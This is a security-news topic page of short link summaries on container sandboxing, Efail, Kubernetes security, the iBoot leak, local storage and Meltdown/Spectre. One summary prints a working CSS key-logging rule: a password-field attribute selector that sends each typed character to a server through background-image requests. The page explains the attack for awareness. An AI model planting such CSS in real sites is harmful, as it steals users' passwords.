Security Icon

Security

InfoSec, DevSec, Penetration Testing, etc.
34 Stories
All Topics

Jessie Frazelle blog.jessfraz.com

Containers, security, and echo chambers

Jessie Frazelle: There seems to be some confusion around sandboxing containers as of late, mostly because of the recent launch of gvisor... There is a large amount of ignorance towards the existing defaults to make containers secure. Which is crazy since I have written many blog posts on it and given many talks on the subject. Jessie has been doing the yeoman's work of Linux kernel isolation and making containers secure for awhile now, but much of that work has been overlooked or disregarded by others in the community. I'm on the outside looking in at this situation, so it's tough to call exactly what's going on, but according to Jessie: When you work at a large organization you are surrounded by an echo chamber. So if everyone in the org is saying “containers are not secure,” you are bound to believe it and not research actual facts. That doesn't mean Jessie thinks containers are secure (click through to read her take on that). There's a lot to dig in to here and think about. I'll pull out one last point: I am not trying to throw shade at gvisor but merely clear up some FUD in the world of open source marketing. I truly believe that people choosing projects to use should research into them and not just choose something shiny that came out of Big Corp. Now that's a sentiment I can get behind! Oh, and listen to this related episode of The Changelog if you haven't yet. It's a must-listen for all developers.

read more...

Medium Icon Medium

An Efail postmortem

Efail caused a panic at the disco: ... some researchers in Europe published a paper with the bombshell title “Efail: Breaking S/MIME and OpenPGP Email Encryption using Exfiltration Channels.” There were a lot of researchers on that team but in the hours after release Sebastian Schinzel took the point on Twitter for the group. Oh, my, did the email crypto world blow up. The following are some thoughts that have benefited from a few days for things to settle. Lots of interesting insights here, perhaps most controversially how the EFF's handling of the situation may have done more harm than good in the author's opinion. Also: we could stand to have a renewed appreciation for OpenPGP’s importance to not just email crypto, but the global economy. I can say I definitely have more appreciation for it after reading this than I did before. I hadn't thought about its influence (which is huge) outside of encrypted email.

read more...

Zack Whittaker www.zdnet.com

I asked Apple for all my data. Here's what was sent back.

Zack Whittaker writes for Zero Day: Apple gave me all the data it collected on me since I bought my first iPhone — in 2010. This is what has largely stood out to me in the ongoing discussion about what data the four have on me and how they use it... As insightful as it was, Apple's treasure trove of my personal data is a drop in the ocean to what social networks or search giants have on me, because Apple is primarily a hardware maker and not ad-driven, like Facebook and Google, which use your data to pitch you ads. Want to request your data? It takes just a few seconds...

read more...

Google Icon Google

gVisor – a sandboxed container runtime

Why does this exist? Containers are not a sandbox. While containers have revolutionized how we develop, package, and deploy applications, running untrusted or potentially malicious code without additional isolation is not a good idea. The efficiency and performance gains from using a single, shared kernel also mean that container escape is possible with a single vulnerability. gVisor takes a distinct approach to container sandboxing and makes a different set of technical trade-offs compared to existing sandbox technologies, thus providing new tools and ideas for the container security landscape.

read more...

GitHub Icon GitHub

⚡️ Let's Encrypt strikes again, this time in your GitHub Pages

Parker Moore, on GitHub's blog: Today, custom domains on GitHub Pages are gaining support for HTTPS as well, meaning over a million GitHub Pages sites will be served over HTTPS. What's more: We have partnered with the certificate authority Let’s Encrypt on this project. As supporters of Let’s Encrypt’s mission to make the web more secure for everyone, we’ve officially become Silver-level sponsors of the initiative. If your custom domain uses CNAME or ALIAS records, no action is required to go HTTPS. If (like me), you have a custom domain using A records, follow along here.

read more...

Kubernetes Icon github.com

A best practice guide to Kubernetes security

K8s is a powerful platform which can be abused in many ways if not configured properly. Contributors to this guide are running Kubernetes in production and worked on several K8s projects to learn about security flaws the hard way. This guide scores major points for having battle-hardened contributors. I also dig how they indicate the severity/importance of each topic with an emoji. Look out for the 💥s!

read more...

Griffin Byatt github.com

Sobelow – a security-focused static analyzer for the Phoenix framework

Yesterday, Griffin Byatt hit me up in Slack and let me know we had a few security holes. 😱 After a quick discussion about the magnitude of said holes, he informed me that he'd found them by running our code through his static analysis tool, Sobelow. Say what? For security researchers, it is a useful tool for getting a quick view of points-of-interest. For project maintainers, it can be used to prevent the introduction of a number of common vulnerabilities. I asked Griffin if he'd be kind enough to open a PR with the fixes so we can link it up and use it to show folks how handy this tool is. So that's what he did and that's what I'm doing! 💚

read more...

Security Icon jakearchibald.com

Third party CSS is not safe

Jake Archibald goes much deeper on our previous report of CSS key logging. Some folks called for browsers to 'fix' it. Some folks dug a bit deeper and saw that it only affected sites built in React-like frameworks, and pointed the finger at React. But the real problem is thinking that third party content is 'safe'. Jake shared many examples as well as ways to mitigate these types of attacks.

read more...

Security Icon github.com

CSS key logging is a thing?! 😱

Turns out it definitely can be, as long as you are using a component-style JavaScript tool (such as React) that updates input values on every keypress. Here's how it works: Utilizing CSS attribute selectors, one can request resources from an external server under the premise of loading a background-image. Add some CSS that looks like this: input[type="password"][value$="a"] { background-image: url("http://localhost:3000/a"); } When the user types an a in to the password field, it will hit your server for logging. Dastardly!

read more...

iOS Icon motherboard.vice.com

Someone published the source code to iBoot (a critical piece of iOS) on GitHub

This is being called "the biggest leak in history", which is probably not true (remember when Gizmodo got its grubby paws on the iPhone 4?). But it's likely the biggest leak in Apple software history. Motherboard says it... could pave the way for hackers and security researchers to find vulnerabilities in iOS and make iPhone jailbreaks easier to achieve. That's plausible. iBoot is responsible for ensuring a trusted boot of the O/S. The specific version posted was from iOS 9, but this portion of code probably doesn't get updated as often as the Music app, so it's likely still relevant. Apple promptly posted a DMCA takedown request, and the source code is no longer publicly available. But we developers know all to well that once source code is made public, there's no taking it private again.

read more...

Security Icon www.rdegges.com

Please stop using Local Storage

Randall Degges examines the good and bad uses of Local Storage. tldr, don't use it to store sensitive data. Almost every day I stumble across a new website storing sensitive user information in local storage and it bothers me to know that so many developers are opening themselves up to catastrophic security issues by doing so. Let’s have a heart-to-heart and talk about local storage and why you should stop using it to store session data.

read more...

Medium Icon Medium

Meltdown and Spectre Explained

If some or most of what you've heard or read about Meltdown and Spectre has gone over your head, then you should 💯 read this technical explainer from Matt Klein (also known for being the creator of Envoy). Matt: I have not seen a good mid-level introduction to the vulnerabilities and mitigations. In this post I’m going to attempt to correct that by providing a gentle introduction to the hardware and software background required to understand the vulnerabilities, a discussion of the vulnerabilities themselves, as well as a discussion of the current mitigations. Matt goes on to share graphic charts of CPUs, virtual memory, and code samples to breakdown the exploit.

read more...
0:00 / 0:00